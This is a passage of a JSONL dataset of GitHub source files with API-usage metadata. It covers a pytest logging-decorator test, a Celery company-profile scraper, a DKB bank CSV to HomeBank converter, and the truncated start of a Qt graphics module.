"webapp1.models.db.session.commit", "line_number": 468, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 468, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 468, "usage_type": "name"}, {"api_name": "webapp1.models.Events", "line_number": 469, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 469, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 469, "usage_type": "attribute"}, {"api_name": "flask.ext.login.current_user.get_id", "line_number": 469, "usage_type": "call"}, {"api_name": "flask.ext.login.current_user", "line_number": 469, "usage_type": "name"}, {"api_name": "webapp1.models.db.session.add", "line_number": 470, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 470, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 470, "usage_type": "name"}, {"api_name": "webapp1.models.db.session.commit", "line_number": 471, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 471, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 471, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 476, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 482, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 482, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 482, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 483, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 483, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 483, "usage_type": "name"}, {"api_name": "webapp1.models.db.engine.execute", "line_number": 485, "usage_type": "call"}, {"api_name": "webapp1.models.db.engine", "line_number": 485, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 485, "usage_type": "name"}, {"api_name": "flask.ext.login.current_user.get_id", "line_number": 485, "usage_type": "call"}, {"api_name": "flask.ext.login.current_user", "line_number": 485, "usage_type": "name"}, {"api_name": "webapp1.models.db.session.commit", "line_number": 486, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 486, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 486, "usage_type": "name"}, {"api_name": "webapp1.models.db.engine.execute", "line_number": 487, "usage_type": "call"}, {"api_name": "webapp1.models.db.engine", "line_number": 487, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 487, "usage_type": "name"}, {"api_name": "flask.ext.login.current_user.get_id", "line_number": 487, "usage_type": "call"}, {"api_name": "flask.ext.login.current_user", "line_number": 487, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 490, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 490, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 491, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 491, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 493, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 493, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 494, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 494, "usage_type": "attribute"}, {"api_name": "webapp1.models.Events", "line_number": 495, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 495, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 495, "usage_type": "attribute"}, {"api_name": "flask.ext.login.current_user.get_id", "line_number": 495, "usage_type": "call"}, {"api_name": "flask.ext.login.current_user", "line_number": 495, "usage_type": "name"}, {"api_name": "webapp1.models.db.session.add", "line_number": 496, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 496, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 496, "usage_type": "name"}, {"api_name": "webapp1.models.db.session.commit", "line_number": 497, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 497, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 497, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 502, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 508, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 508, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 508, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 509, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 509, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 509, "usage_type": "name"}, {"api_name": "webapp1.models.db.engine.execute", "line_number": 511, "usage_type": "call"}, {"api_name": "webapp1.models.db.engine", "line_number": 511, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 511, "usage_type": "name"}, {"api_name": "flask.ext.login.current_user.get_id", "line_number": 511, "usage_type": "call"}, {"api_name": "flask.ext.login.current_user", "line_number": 511, "usage_type": "name"}, {"api_name": "webapp1.models.db.session.commit", "line_number": 512, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 512, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 512, "usage_type": "name"}, {"api_name": "webapp1.models.db.engine.execute", "line_number": 513, "usage_type": "call"}, {"api_name": "webapp1.models.db.engine", "line_number": 513, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 513, "usage_type": "name"}, {"api_name": "flask.ext.login.current_user.get_id", "line_number": 513, "usage_type": "call"}, {"api_name": "flask.ext.login.current_user", "line_number": 513, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 516, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 516, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 517, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 517, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 519, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 519, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 520, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 520, "usage_type": "attribute"}, {"api_name": "webapp1.models.Events", "line_number": 521, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 521, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 521, "usage_type": "attribute"}, {"api_name": "flask.ext.login.current_user.get_id", "line_number": 521, "usage_type": "call"}, {"api_name": "flask.ext.login.current_user", "line_number": 521, "usage_type": "name"}, {"api_name": "webapp1.models.db.session.add", "line_number": 522, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 522, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 522, "usage_type": "name"}, {"api_name": "webapp1.models.db.session.commit", "line_number": 523, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 523, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 523, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 527, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 533, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 533, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 533, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 534, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 534, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 534, "usage_type": "name"}, {"api_name": "webapp1.models.db.engine.execute", "line_number": 536, "usage_type": "call"}, {"api_name": "webapp1.models.db.engine", "line_number": 536, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 536, "usage_type": "name"}, {"api_name": "flask.ext.login.current_user.get_id", "line_number": 536, "usage_type": "call"}, {"api_name": "flask.ext.login.current_user", "line_number": 536, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 539, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 539, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 540, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 540, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 542, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 542, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 543, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 543, "usage_type": "attribute"}, {"api_name": "webapp1.models.db.engine.execute", "line_number": 544, "usage_type": "call"}, {"api_name": "webapp1.models.db.engine", "line_number": 544, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 544, "usage_type": "name"}, {"api_name": "flask.ext.login.current_user.get_id", "line_number": 544, "usage_type": "call"}, {"api_name": "flask.ext.login.current_user", "line_number": 544, "usage_type": "name"}, {"api_name": "webapp1.models.db.session.commit", "line_number": 545, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 545, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 545, "usage_type": "name"}, {"api_name": "webapp1.models.Events", "line_number": 546, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 546, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 546, "usage_type": "attribute"}, {"api_name": "flask.ext.login.current_user.get_id", "line_number": 546, "usage_type": "call"}, {"api_name": "flask.ext.login.current_user", "line_number": 546, "usage_type": "name"}, {"api_name": "webapp1.models.db.session.add", "line_number": 547, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 547, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 547, "usage_type": "name"}, {"api_name": "webapp1.models.db.session.commit", "line_number": 548, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 548, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 548, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 551, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 556, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 556, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 556, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 557, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 557, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 557, "usage_type": "name"}, {"api_name": "webapp1.models.db.engine.execute", "line_number": 559, "usage_type": "call"}, {"api_name": "webapp1.models.db.engine", "line_number": 559, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 559, "usage_type": "name"}, {"api_name": "flask.ext.login.current_user.get_id", "line_number": 559, "usage_type": "call"}, {"api_name": "flask.ext.login.current_user", "line_number": 559, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 562, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 562, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 563, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 563, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 565, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 565, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 566, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 566, "usage_type": "attribute"}, {"api_name": "webapp1.models.Events", "line_number": 567, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 567, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 567, "usage_type": "attribute"}, {"api_name": "flask.ext.login.current_user.get_id", "line_number": 567, "usage_type": "call"}, {"api_name": "flask.ext.login.current_user", "line_number": 567, "usage_type": "name"}, {"api_name": "webapp1.models.db.session.add", "line_number": 568, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 568, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 568, "usage_type": "name"}, {"api_name": "webapp1.models.db.session.commit", "line_number": 569, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 569, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 569, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 573, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 578, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 578, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 578, "usage_type": "name"}, {"api_name": "flask.request.args.get", "line_number": 579, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 579, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 579, "usage_type": "name"}, {"api_name": "webapp1.models.db.engine.execute", "line_number": 581, "usage_type": "call"}, {"api_name": "webapp1.models.db.engine", "line_number": 581, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 581, "usage_type": "name"}, {"api_name": "flask.ext.login.current_user.get_id", "line_number": 581, "usage_type": "call"}, {"api_name": "flask.ext.login.current_user", "line_number": 581, "usage_type": "name"}, {"api_name": "datetime.datetime.today", "line_number": 584, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 584, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 585, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 585, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 587, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 587, "usage_type": "attribute"}, {"api_name": "datetime.datetime.today", "line_number": 588, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 588, "usage_type": "attribute"}, {"api_name": "webapp1.models.Events", "line_number": 589, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 589, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 589, "usage_type": "attribute"}, {"api_name": "flask.ext.login.current_user.get_id", "line_number": 589, "usage_type": "call"}, {"api_name": "flask.ext.login.current_user", "line_number": 589, "usage_type": "name"}, {"api_name": "webapp1.models.db.session.add", "line_number": 590, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 590, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 590, "usage_type": "name"}, {"api_name": "webapp1.models.db.session.commit", "line_number": 591, "usage_type": "call"}, {"api_name": "webapp1.models.db.session", "line_number": 591, "usage_type": "attribute"}, {"api_name": "webapp1.models.db", "line_number": 591, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 595, "usage_type": "call"}]} +{"seq_id": "25627561256", "text": "import logging\nfrom benchmarkstt.decorators import log_call\n\n\ndef test_log_call(caplog):\n logger = logging.getLogger()\n\n @log_call(logger, logging.WARNING)\n def test(*args, **kwargs):\n return 'result'\n\n test('arg1', arg2='someval')\n assert caplog.record_tuples == [\n ('root', logging.WARNING, \"test('arg1', arg2='someval')\")\n ]\n\n\ndef test_log_call2(caplog):\n logger = logging.getLogger('testname')\n caplog.set_level(logging.INFO)\n\n @log_call(logger, result=True, log_level=logging.INFO)\n def test(*args, **kwargs):\n return 'result'\n\n test(arg2='someval')\n assert caplog.record_tuples == [\n ('testname', logging.INFO, \"test(arg2='someval')\"),\n ('testname', logging.INFO, 'test returned: result')\n ]\n\n\ndef test_log_call3(caplog):\n logger = logging.getLogger('testname')\n caplog.set_level(logging.DEBUG)\n\n @log_call(logger)\n def funcname():\n return None\n\n funcname()\n assert caplog.record_tuples == [\n ('testname', logging.DEBUG, \"funcname()\"),\n ]\n", "repo_name": "ebu/benchmarkstt", "sub_path": "tests/benchmarkstt/test_decorators.py", "file_name": "test_decorators.py", "file_ext": "py", "file_size_in_byte": 1054, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 51, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 6, "usage_type": "call"}, {"api_name": "benchmarkstt.decorators.log_call", "line_number": 8, "usage_type": "call"}, {"api_name": "logging.WARNING", "line_number": 8, "usage_type": "attribute"}, {"api_name": "logging.WARNING", "line_number": 14, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 19, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 20, "usage_type": "attribute"}, {"api_name": "benchmarkstt.decorators.log_call", "line_number": 22, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 22, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 28, "usage_type": "attribute"}, {"api_name": "logging.INFO", "line_number": 29, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 34, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 35, "usage_type": "attribute"}, {"api_name": "benchmarkstt.decorators.log_call", "line_number": 37, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 43, "usage_type": "attribute"}]} +{"seq_id": "9593509599", "text": "from celery import Celery\nfrom lxml import html\nimport json\nimport requests\nimport re\n\napp = Celery('worker', backend='rpc://', broker='amqp://')\n\n\n@app.task\ndef crawler(data):\n '''Request and parse data from company URL'''\n # Get raw page from url\n resp = requests.get(data['url'])\n resp.encoding = 'utf-8'\n\n # Parse element from raw page\n tree = html.fromstring(resp.text)\n text = tree.xpath(\"//p/strong[contains(text(), {})]/../following-sibling::table/tr\".format(data['ticker_symbol']))\n clean_text = [i.replace(\"\\n\", \"\").replace(\"\\t\", \"\") for i in text[0].xpath(\"td[1]/text()\")]\n name = clean_text[0]\n address = clean_text[1]\n phone1 = clean_text[2]\n international_phone1 = phone_num_parser(phone1)\n phone2 = clean_text[3]\n international_phone2 = phone_num_parser(phone2)\n email = clean_text[4]\n website = clean_text[5]\n business = clean_text[6].replace(\"Business: \", \"\")\n\n # Parse financial summary data\n financial_summary = {}\n summ = text[0].xpath(\"td[2]/table/tr\")\n for i in summ:\n key = i.xpath('td[1]/strong/text()')[0].replace(\":\", \"\").lower()\n try:\n val = i.xpath('td[2]/text()')[0]\n except:\n val = \"\"\n financial_summary.update({key: val})\n\n # Parse bussines summary data\n bs = str(text[1].xpath(\"td\")[0].text_content())\n bs = bs.replace(\"\\t\", \"\").replace(u\"\\xa0\", \"\")\n business_summary = re.search(r\"Business Summary:\\n(.*?)\\n\", bs).group(1)\n\n result = re.findall(r\"Auditing Company:\\n(.*?)Add|Auditing Company:\\n(.*?)Địa|Auditing Company:\\n(.*?)\\n\", bs)\n auditing_company = get_val(result) \n\n result = re.findall(r\"Address: (.*?)Tel|Địa chỉ: (.*?)Điện|Address: (.*?)\\n|Địa chỉ: (.*?)\\n\", bs)\n auditing_company_address = get_val(result)\n\n result = re.findall(r\"Tel: (.*?) -|Tel: (.*?) Fax|Điện thoại:(.*?) -|Điện thoại: (.*?) -|Điện thoại: (.*?) Fax|Điện thoại:(.*?) Fax\", bs)\n auditing_company_phone = get_val(result)\n\n result = re.findall(r\"Fax: (.*?) W|Fax: (.*?)W|Fax: (.*?)\\n\", bs)\n auditing_company_fax = get_val(result)\n\n result = re.findall(r\"Website: (.*?) -|Website: (.*?)\\n\", bs)\n auditing_company_web = get_val(result)\n\n result = re.findall(r\"Email: (.*?)\\n\", bs)\n auditing_company_email = result[0] if result else \"\"\n\n result = re.findall(r\"Established License: (.*?)\\n\", bs)\n established_license = result[0] if result else \"\"\n\n result = re.findall(r\"Business License: (.*?)\\n\", bs)\n business_license = result[0] if result else \"\"\n\n # Create company profile dict\n company_profile = {\n \"company name\": data[\"company_name\"],\n \"company_url\": data[\"url\"],\n \"ticker_symbol\": data[\"ticker_symbol\"],\n \"company street address\": address,\n \"country\": \"Vietnam\",\n \"company description\": business_summary,\n \"company phone number\": [phone1, phone2],\n \"business\": business,\n \"company website\": website,\n \"company email\": email,\n \"financial summary\": financial_summary,\n \"business registration\": {\n \"established licence\": established_license, \n \"business license\": business_license\n },\n \"auditing company\": {\n \"company_name\": auditing_company, \n \"address\": auditing_company_address, \n \"phone_number\": auditing_company_phone,\n \"email\": auditing_company_email,\n \"website\": auditing_company_web\n }\n }\n\n return company_profile\n\n\ndef get_val(result):\n '''get value from findall result'''\n val = ''\n if result:\n for i in result[0]:\n if i:\n val = i\n\n return val\n\n\ndef phone_num_parser(number):\n '''parse phone number international'''\n list_number = re.findall(r\"\\d+\", number)\n clean_number = \"\".join(list_number)\n parsed_number = re.sub(r'^\\0|84', '+84', clean_number, 1)\n return parsed_number\n", "repo_name": "fahmifm/company_scraping", "sub_path": "scrape/worker.py", "file_name": "worker.py", "file_ext": "py", "file_size_in_byte": 3966, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "celery.Celery", "line_number": 7, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 14, "usage_type": "call"}, {"api_name": "lxml.html.fromstring", "line_number": 18, "usage_type": "call"}, {"api_name": "lxml.html", "line_number": 18, "usage_type": "name"}, {"api_name": "re.search", "line_number": 45, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 47, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 50, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 53, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 56, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 59, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 62, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 65, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 68, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 113, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 115, "usage_type": "call"}]} +{"seq_id": "12432054094", "text": "#!/usr/bin/env python3\n\n# http://homebank.free.fr/help/06csvformat.html\n\nfrom decimal import Decimal\nfrom datetime import datetime\n\nPAYMODES = [\"None\", # 0\n\"Credit Card\", # 1\n\"Check\", # 2\n\"Cash\", # 3\n\"Transfer\", # 4\n\"Internal Transfer\", # 5\n\"Debit Card\", # 6\n\"Standing Order\", # 7\n\"Electronic Payment\", # 8\n\"Deposit\", # 9\n\"FI Fees\"] # 10\nPAYMODE_NONE = 0\nPAYMODE_CREDIT_CARD = 1\nPAYMODE_CASH = 3\nPAYMODE_INTERNAL_TRANSFER = 5\nPAYMODE_EINZUG = 8\nPAYMODE_FEE = 10\n\ndef split_line(line):\n\t\"\"\"returns a list csv elements\"\"\"\n\t# it removes semicolons from the end of the line first\n\t# print(\"%r\" % line.strip(\";\").split(\";\"))\n\treturn list(map(lambda x:x.strip('\"'), line.strip(\";\\n\").split(\";\")))\n\ndef get_data(line, assert_type=None, convert=lambda x:x):\n\tcsv_type, value = split_line(line)\n\tif assert_type:\n\t\tassert csv_type == assert_type\n\treturn convert(value) \n\ndef to_string(value):\n\treturn value\n\ndef to_decimal(value):\n\tif \" \" in value:\n\t\tvalue, _ = value.split(\" \", 1)\n\treturn Decimal(value.replace(\",\", \".\"))\n\ndef to_date(value):\n\treturn datetime.strptime(value, \"%d.%m.%Y\")\n\ndef get_string_until(astr, break_chars=\" 123456780,;.-\", valid_char=lambda x: True):\n\tret = []\n\tfor char in astr:\n\t\tif valid_char(char) and char not in break_chars:\n\t\t\tret.append(char)\n\t\telse:\n\t\t\tbreak\n\treturn \"\".join(ret)\n\ndef guess_paymode(payee, description, default=PAYMODE_NONE):\n\tif payee in (\"HVB\", \"STADTSPARKASSE\", \"AUSZAHLUNG\"):\n\t\treturn PAYMODE_INTERNAL_TRANSFER\n\tif payee == \"DKB\":\n\t\treturn PAYMODE_FEE\n\treturn default\n\ndef guess_payee(description):\n\tname = get_string_until(description)\n\tif name == \"\":\n\t\treturn \"DKB\"\n\n\treturn name.upper()\n\ndef guess_category(payee, description, last_catergory=\"\"):\n\tif payee == \"WEBFACTION\":\n\t\treturn \"Homepage:webfaction\"\n\tif payee == \"GH\":\n\t\treturn \"Homepage:github\"\n\telif payee == \"DB\":\n\t\treturn \"Travel:Train\"\n\telif payee == \"GOOGLE\":\n\t\tif \"Music\" in description:\n\t\t\treturn \"Multimedia:Music\"\n\telif payee == \"HabenzinsenZ\":\n\t\treturn \"Zins\"\n\telif payee == \"DKB\":\n\t\tif \"für Auslandseinsatz\" in description: \n\t\t\treturn last_catergory or \"Transaction Fee\"\n\telif \"HUMBLE\" in payee:\n\t\treturn \"hobby:games\"\n\treturn \"\"\n\n\n\ndef convert_csv(csv_filename):\n\tcsv_fh = open(csv_filename, encoding=\"latin-1\")\n\taccount_type, account_info = split_line(csv_fh.readline())\n\n\tit = get_transactions_visadkb(csv_fh)\n\tvon, bis = next(it)\n\tfn = \"dkbvisa_%s-%s.csv\" % (von.strftime(\"%y%m%d\"), bis.strftime(\"%y%m%d\"))\n\twith open(fn, \"w\") as fh:\n\t\t# fh.write(Transaction.csv_head)\n\t\tfor transaction in it:\n\t\t\tfh.write(transaction.to_csv())\n\nclass Transaction(object):\n\tcsv_head = \"date;paymode;info;payee;description;amount;category\\n\"\n\tdef __init__(self, date, amount, **kw):\n\t\t#date ; paymode ; info ; payee ; description ; amount ; category\n\t\tself.date = date\n\t\tself.paymode = kw.get('paymode', PAYMODE_NONE)\n\t\tself.info = kw.get('info', \"\")\n\t\tself.payee = kw.get('payee', \"Unknown\")\n\t\tself.description = kw.get('description', \"\")\n\t\tself.amount = amount\n\t\tself.category = kw.get('category', \"\")\n\n\n\tdef get_csv_date(self):\n\t\treturn self.date.strftime(\"%d-%m-%y\")\n\tdef get_csv_paymode(self):\n\t\treturn str(self.paymode)\n\tdef get_csv_info(self):\n\t\treturn self.info\n\tdef get_csv_payee(self):\n\t\treturn self.payee\n\tdef get_csv_description(self):\n\t\treturn self.description\n\tdef get_csv_amount(self):\n\t\treturn \"%.2f\" % self.amount\n\tdef get_csv_category(self):\n\t\treturn self.category\n\tdef to_csv(self):\n\t\tdata = [\"date\", \"paymode\", \"info\", \"payee\", \"description\", \"amount\", \"category\"]\n\t\treturn \"%s\\n\"% \";\".join(map(lambda x: getattr(self, \"get_csv_%s\" % x)(), data))\n\n# 1 \"Kreditkarte:\";\"4998************ Kreditkarte\";\n# 2\n# 3 \"Von:\";\"27.12.2012\";\n# 4 \"Bis:\";\"04.01.2013\";\n# 5 \"Saldo:\";\"11266.89 EUR\";\n# 6 \"Datum:\";\"04.01.2013\";\n# 7 \n# 8 \"Umsatz abgerechnet\";\"Wertstellung\";\"Belegdatum\";\"Umsatzbeschreibung\";\"Betrag (EUR)\";\"Ursprünglicher Betrag\";\n# 9 \"Nein\";\"04.01.2013\";\"03.01.2013\";\"Amazon EUAMAZON.DE\";\"-27,77\";\"\";\nVISA_DESC = '\"Umsatz abgerechnet\";\"Wertstellung\";\"Belegdatum\";\"Umsatzbeschreibung\";\"Betrag (EUR)\";\"Ursprünglicher Betrag\";\\n'\ndef get_transactions_visadkb(csv_fh):\n\tassert csv_fh.readline() == '\\n'\n\tvon = get_data(csv_fh.readline(), assert_type=\"Von:\", convert=to_date)\n\tbis = get_data(csv_fh.readline(), assert_type=\"Bis:\", convert=to_date)\n\tsaldo = get_data(csv_fh.readline(), assert_type=\"Saldo:\")\n\tdatum = get_data(csv_fh.readline(), assert_type=\"Datum:\")\n\tassert csv_fh.readline() == '\\n'\n\tvisa_desc = csv_fh.readline()\n\tassert visa_desc == VISA_DESC, \"\\n%r\\n%r\" % ( visa_desc, VISA_DESC)\n\n\tyield (von, bis)\n\tlast_catergory = \"\"\n\tfor line in csv_fh:\n\t\twertstellung, beschreibung, betrag = get_dkbvisa_transaction(line)\n\t\tpayee = guess_payee(beschreibung)\n\t\tcategory = guess_category(payee, beschreibung, last_catergory=last_catergory)\n\t\tpaymode = guess_paymode(payee, beschreibung, default=PAYMODE_CREDIT_CARD)\n\t\tt = Transaction(date=wertstellung, amount=betrag, description=beschreibung, \n\t\t\tpayee=payee, category=category, paymode=paymode)\n\t\tyield t\n\t\t#print(t.to_csv())\n\ndef get_dkbvisa_transaction(line):\n\tconvert_l = [to_date, to_string, to_decimal]\n\t_, wertstellung, _, beschreibung, betrag, urspruenglich = split_line(line)\n\tif urspruenglich:\n\t\tbeschreibung += \" ursprünglich %s\" % urspruenglich\n\treturn list(map(lambda x:x[0](x[1]), zip(convert_l, [wertstellung, beschreibung, betrag])))\n\n\n# 1 \"Kontonummer:\";\"12774055 / Internet-Konto\";\n# 2\n# 3 \"Von:\";\"27.12.2012\";\n# 4 \"Bis:\";\"04.01.2013\";\n# 5 \"Kontostand vom:\";\"500,00\";\n# 6\n# 7 \"Buchungstag\";\"Wertstellung\";\"Buchungstext\";\"Auftraggeber/Begünstigter\";\"Verwendungszweck\";\"Kontonummer\";\"BLZ\";\"Betrag (EUR)\";\n# 8 \"04.01.2013\";\"04.01.2013\";\"LASTSCHRIFT\";\"AZ REAL ESTATE GERMANY\";\"X X 01.01.13-31.01.13-GM WOHNEN 01.01.13-31.01.13-VZ BK 01.01.13-31.01.13-VZ HK X \";\"905001200\";\"60080000\";\"-1.091,00\";\n\n\n# Column list:\n# date ; paymode ; info ; payee ; description ; amount ; category\n\n# Values:\n# date => format should be DD-MM-YY\n# mode => from 0=none to 10=FI fee\n# info => a string\n# payee => a payee name\n# description => a string\n# amount => a number with a '.' as decimal separator, ex: -24.12 or 36.75\n# category => a full category name (category, or category:subcategory)\n\nif __name__ == \"__main__\":\n\tconvert_csv(\"import/4998____________.csv\")", "repo_name": "hwmrocker/dkbcsv2homebank", "sub_path": "csvc.py", "file_name": "csvc.py", "file_ext": "py", "file_size_in_byte": 6416, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "52", "api": [{"api_name": "decimal.Decimal", "line_number": 44, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 47, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 47, "usage_type": "name"}]} +{"seq_id": "13208813106", "text": "import weakref\nfrom uuid import UUID, uuid4\n\nfrom Qt import QtCore\nfrom Qt import QtGui\nfrom Qt.QtWidgets import QGraphicsPathItem\nfrom Qt.QtWidgets import QGraphicsEllipseItem\nfrom Qt.QtWidgets import QMenu\nfrom Qt.QtWidgets import QStyle\n\nfrom 